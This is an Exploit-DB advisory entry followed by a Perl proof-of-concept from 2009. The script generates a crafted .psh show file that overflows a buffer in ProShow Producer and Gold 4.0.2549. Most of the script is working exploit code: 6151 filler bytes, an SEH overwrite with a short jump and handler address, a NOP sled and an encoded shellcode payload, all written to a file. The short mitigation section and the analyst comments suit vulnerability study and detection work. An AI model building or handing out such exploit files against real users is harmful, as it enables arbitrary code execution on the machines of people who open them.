vendor:
ProShow Producer and ProShow Gold
by:
hack4love
7.5
CVSS
HIGH
Buffer Overflow
CWE
Product Name: ProShow Producer and ProShow Gold
Affected Version From: ProShow Producer and ProShow Gold versions 4.0.2549
Affected Version To: ProShow Producer and ProShow Gold versions 4.0.2549
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH

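A specially crafted .psh show file can crash ProShow Producer and ProShow Gold version 4.0.2549, or execute arbitrary code in the context of the user who opens it. The vulnerability is caused by a buffer overflow in the parsing of the file header; in the proof of concept below, the over-long value is the `cell[0].images[0].image` entry, and the title describes the overflow as overwriting a structured exception handler (SEH) record. Exploitation is local and needs the victim to open the file.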

Mitigation:

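Update to a patched version of ProShow Producer or ProShow Gold if the vendor has released one; this entry records "Patch Exists: NO" for 4.0.2549. Do not open or download .psh files from untrusted sources. On Windows versions that support them, system-wide exploit mitigations such as DEP and SEHOP make SEH-overwrite exploits of this kind harder to carry out.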
Source

Exploit-DB raw data:

#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH
##########################################################################
##http://files.photodex.com/release/psgold_40_2549.exe
##http://files.photodex.com/release/pspro_40_2549.exe
###########################################################################
##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################
###########################################################################
##FIRST WAS BY corelanc0d3r################################################
###########################################################################
# First part of the generated .psh show file: plain-text "key=value" lines,
# one setting per line. Everything here is printable ASCII.
# The final entry (cell[0].images[0].image=...) deliberately has NO trailing
# "\n", so whatever is concatenated after $header becomes part of that image
# path value rather than a new line.
# Detection note: in this layout a legitimate value is a short relative path;
# a single "image=" value thousands of bytes long, or one containing
# non-printable bytes, is anomalous for a text-format show file.
my $header="Photodex(R) ProShow(TM) Show File Version=0\n".
"proshowVersion=2549\n".
"title=Untitled ProShow 1\n".
"fileName=proshowsploit.psh\n".
"description=''\n".
"showAspect=1\n".
"showSizeX=16\n".
"showSizeY=9\n".
"loop=1\n".
"loopRestart=1\n".
"displaySizeX=704\n".
"displaySizeY=528\n".
"videoSizeX=720\n".
"videoSizeY=480\n".
"videoFrameRate=29970\n".
"videoBitRate=1120000\n".
"videoMuxBitRate=1394400\n".
"outputImageSizeX=1024\n".
"outputImageSizeY=768\n".
"outputQuality=80\n".
"toolbarEnable=1\n".
"allowQuit=1\n".
"allowPlay=1\n".
"allowTime=1\n".
"allowRestart=1\n".
"allowSave=1\n".
"allowSaveAll=1\n".
"allowPrint=1\n".
"allowPrintAll=1\n".
"allowCopy=1\n".
"allowSaver=1\n".
"allowCta=1\n".
"ctaLabel=ProShow Info\n".
"ctaURL=http://www.photodex.com/\n".
"background=1\n".
"bgOutlineColor=0\n".
"bgSizeMode=1\n".
"bgColorizeColor=8421504\n".
"waterOpacity=128\n".
"waterZoom=10000\n".
"waterColorizeColor=8421504\n".
"musicVolumeOffset=100\n".
"defaultCellVolumeOffset=100\n".
"defaultCellFadeIn=100\n".
"defaultCellFadeOut=100\n".
"defaultMusicVolumeOffset=50\n".
"defaultMusicFadeIn=100\n".
"defaultMusicFadeOut=100\n".
"maxDispWidth=800\n".
"maxDispHeight=600\n".
"maxRender=1\n".
"maxRenderWidth=800\n".
"maxRenderHeight=600\n".
"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n".
"makeFileLocalFolder=c:/\n".
"cells=2\n".
"cell[0].imageEnable=1\n".
"cell[0].nrOfImages=1\n".
# Unterminated on purpose: the line is closed only by the "\n" that opens $header2.
"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
####################################################################################
# Pieces that are appended, in this order, to the unterminated image path
# value above: $bof, $nsh, $seh, $nop, $sec.
# Per the script's title this is an SEH-based stack overflow; the offsets and
# the address below are specific to the 4.0.2549 builds named in the header
# comments and cannot be confirmed from this listing alone.

# 6151 bytes of 0x41 ('A') used as filler in front of the two 4-byte values.
my $bof="\x41" x 6151;
# Four bytes: EB 06 (x86 short jump) followed by two 0x90 bytes.
# NOTE(review): presumably occupies the "next handler" slot of the
# overwritten SEH record -- confirm under a debugger in a lab.
my $nsh="\xEB\x06\x90\x90";
# Four bytes, little-endian 0x101a4cf9. NOTE(review): address-like value that
# presumably replaces the handler pointer; the module it points into is not
# identified anywhere on this page.
my $seh="\xf9\x4c\x1a\x10";####Universal ##if.dnt
# 20 bytes of 0x90 (x86 NOP) placed before the payload bytes.
my $nop="\x90" x 20;
# Opaque, non-printable machine-code bytes. What they do cannot be determined
# from this listing; treat them as untrusted and handle any generated file
# only inside an isolated analysis environment.
my $sec=
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2".
"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47".
"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b".
"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f".
"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64".
"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26".
"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89".
"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a".
"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06".
"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
###############################################################################
# Remainder of the show file. The leading "\n" is what finally terminates the
# over-long cell[0].images[0].image value; after it the text returns to
# ordinary printable "key=value" settings for cell[0] and cell[1], ending
# with modifierCount. NOTE(review): presumably present so that the file still
# looks like a complete two-cell show to the parser -- not verifiable here.
my $header2 = "\ncell[0].images[0].imageEnable=1\n".
"cell[0].images[0].name=Abstract_02\n".
"cell[0].images[0].replaceableTemplate=1\n".
"cell[0].images[0].sizeMode=1\n".
"cell[0].images[0].colorizeColor=8421504\n".
"cell[0].images[0].colorizeStrength=10000\n".
"cell[0].images[0].outlineColor=16777215\n".
"cell[0].images[0].aspectX=4\n".
"cell[0].images[0].aspectY=3\n".
"cell[0].images[0].videoVolume=100\n".
"cell[0].images[0].objectId=1\n".
"cell[0].images[0].videoSpeed=100\n".
"cell[0].images[0].nrOfKeyframes=2\n".
"cell[0].images[0].keyframes[0].timeSegment=1\n".
"cell[0].images[0].keyframes[0].attributeMask=-1\n".
"cell[0].images[0].keyframes[0].zoomX=10000\n".
"cell[0].images[0].keyframes[0].zoomY=10000\n".
"cell[0].images[0].keyframes[0].panAccelType=1\n".
"cell[0].images[0].keyframes[0].zoomXAccelType=1\n".
"cell[0].images[0].keyframes[0].zoomYAccelType=1\n".
"cell[0].images[0].keyframes[0].rotationAccelType=1\n".
"cell[0].images[0].keyframes[0].motionSmoothness=-1\n".
"cell[0].images[0].keyframes[0].lockAR=1\n".
"cell[0].images[0].keyframes[0].transparency=0\n".
"cell[0].images[0].keyframes[0].colorizeColor=8421504\n".
"cell[0].images[0].keyframes[0].colorizeStrength=10000\n".
"cell[0].images[0].keyframes[0].shadowOffsetX=70\n".
"cell[0].images[0].keyframes[0].shadowOffsetY=70\n".
"cell[0].images[0].keyframes[1].timestamp=10000\n".
"cell[0].images[0].keyframes[1].timeSegment=3\n".
"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n".
"cell[0].images[0].keyframes[1].attributeMask=-1\n".
"cell[0].images[0].keyframes[1].zoomX=10000\n".
"cell[0].images[0].keyframes[1].zoomY=10000\n".
"cell[0].images[0].keyframes[1].panAccelType=1\n".
"cell[0].images[0].keyframes[1].zoomXAccelType=1\n".
"cell[0].images[0].keyframes[1].zoomYAccelType=1\n".
"cell[0].images[0].keyframes[1].rotationAccelType=1\n".
"cell[0].images[0].keyframes[1].motionSmoothness=-1\n".
"cell[0].images[0].keyframes[1].lockAR=1\n".
"cell[0].images[0].keyframes[1].transparency=0\n".
"cell[0].images[0].keyframes[1].colorizeColor=8421504\n".
"cell[0].images[0].keyframes[1].colorizeStrength=10000\n".
"cell[0].images[0].keyframes[1].shadowOffsetX=70\n".
"cell[0].images[0].keyframes[1].shadowOffsetY=70\n".
"cell[0].background=1\n".
"cell[0].bgDefault=1\n".
"cell[0].bgSizeMode=1\n".
"cell[0].bgColorizeColor=8421504\n".
"cell[0].sound.useDefault=1\n".
"cell[0].sound.volume=100\n".
"cell[0].sound.fadeIn=100\n".
"cell[0].sound.fadeOut=100\n".
"cell[0].sound.async=1\n".
"cell[0].sound.musicUseDefault=1\n".
"cell[0].sound.musicVolume=50\n".
"cell[0].sound.musicFadeIn=100\n".
"cell[0].sound.musicFadeOut=100\n".
"cell[0].musicVolumeOffset=50\n".
"cell[0].time=3000\n".
"cell[0].transId=2\n".
"cell[0].transTime=3000\n".
"cell[0].includeGlobalCaptions=1\n".
"cell[1].imageEnable=1\n".
"cell[1].nrOfImages=1\n".
"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n".
"cell[1].images[0].imageEnable=1\n".
"cell[1].images[0].name=Abstract_01\n".
"cell[1].images[0].replaceableTemplate=1\n".
"cell[1].images[0].sizeMode=1\n".
"cell[1].images[0].colorizeColor=8421504\n".
"cell[1].images[0].colorizeStrength=10000\n".
"cell[1].images[0].outlineColor=16777215\n".
"cell[1].images[0].aspectX=4\n".
"cell[1].images[0].aspectY=3\n".
"cell[1].images[0].videoVolume=100\n".
"cell[1].images[0].objectId=2\n".
"cell[1].images[0].videoSpeed=100\n".
"cell[1].images[0].nrOfKeyframes=2\n".
"cell[1].images[0].keyframes[0].timeSegment=1\n".
"cell[1].images[0].keyframes[0].attributeMask=-1\n".
"cell[1].images[0].keyframes[0].zoomX=10000\n".
"cell[1].images[0].keyframes[0].zoomY=10000\n".
"cell[1].images[0].keyframes[0].panAccelType=1\n".
"cell[1].images[0].keyframes[0].zoomXAccelType=1\n".
"cell[1].images[0].keyframes[0].zoomYAccelType=1\n".
"cell[1].images[0].keyframes[0].rotationAccelType=1\n".
"cell[1].images[0].keyframes[0].motionSmoothness=-1\n".
"cell[1].images[0].keyframes[0].lockAR=1\n".
"cell[1].images[0].keyframes[0].transparency=0\n".
"cell[1].images[0].keyframes[0].colorizeColor=8421504\n".
"cell[1].images[0].keyframes[0].colorizeStrength=10000\n".
"cell[1].images[0].keyframes[0].shadowOffsetX=70\n".
"cell[1].images[0].keyframes[0].shadowOffsetY=70\n".
"cell[1].images[0].keyframes[1].timestamp=10000\n".
"cell[1].images[0].keyframes[1].timeSegment=3\n".
"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n".
"cell[1].images[0].keyframes[1].attributeMask=-1\n".
"cell[1].images[0].keyframes[1].zoomX=10000\n".
"cell[1].images[0].keyframes[1].zoomY=10000\n".
"cell[1].images[0].keyframes[1].panAccelType=1\n".
"cell[1].images[0].keyframes[1].zoomXAccelType=1\n".
"cell[1].images[0].keyframes[1].zoomYAccelType=1\n".
"cell[1].images[0].keyframes[1].rotationAccelType=1\n".
"cell[1].images[0].keyframes[1].motionSmoothness=-1\n".
"cell[1].images[0].keyframes[1].lockAR=1\n".
"cell[1].images[0].keyframes[1].transparency=0\n".
"cell[1].images[0].keyframes[1].colorizeColor=8421504\n".
"cell[1].images[0].keyframes[1].colorizeStrength=10000\n".
"cell[1].images[0].keyframes[1].shadowOffsetX=70\n".
"cell[1].images[0].keyframes[1].shadowOffsetY=70\n".
"cell[1].background=1\n".
"cell[1].bgDefault=1\n".
"cell[1].bgSizeMode=1\n".
"cell[1].bgColorizeColor=8421504\n".
"cell[1].sound.useDefault=1\n".
"cell[1].sound.volume=100\n".
"cell[1].sound.fadeIn=100\n".
"cell[1].sound.fadeOut=100\n".
"cell[1].sound.async=1\n".
"cell[1].sound.musicUseDefault=1\n".
"cell[1].sound.musicVolume=50\n".
"cell[1].sound.musicFadeIn=100\n".
"cell[1].sound.musicFadeOut=100\n".
"cell[1].musicVolumeOffset=50\n".
"cell[1].time=3000\n".
"cell[1].transId=2\n".
"cell[1].transTime=3000\n".
"cell[1].includeGlobalCaptions=1\n".
"modifierCount=0\n";
# Emits the assembled file twice: once to STDOUT and once to disk.
# The STDOUT copy includes the raw non-printable bytes, so running this in an
# interactive terminal writes binary data to the screen.
print $header.$bof.$nsh.$seh.$nop.$sec.$header2;
################################################################################
###################################################################
# Two-argument open with the mode embedded in the string and a bareword
# handle; the result of open() is not checked and no close() is visible in
# this listing. The file is opened in APPEND mode ('>>'), so if
# HACK4LOVE.psh already exists the new content is added after the old.
# Note for analysts: because of the append, the size and hash of a generated
# sample depend on earlier runs, so a file hash is not a stable indicator for
# this PoC; match on content features (the over-long image= value) instead.
open(myfile,'>> HACK4LOVE.psh');
print myfile $header.$bof.$nsh.$seh.$nop.$sec.$header2;
##################################################################

# milw0rm.com [2009-08-25]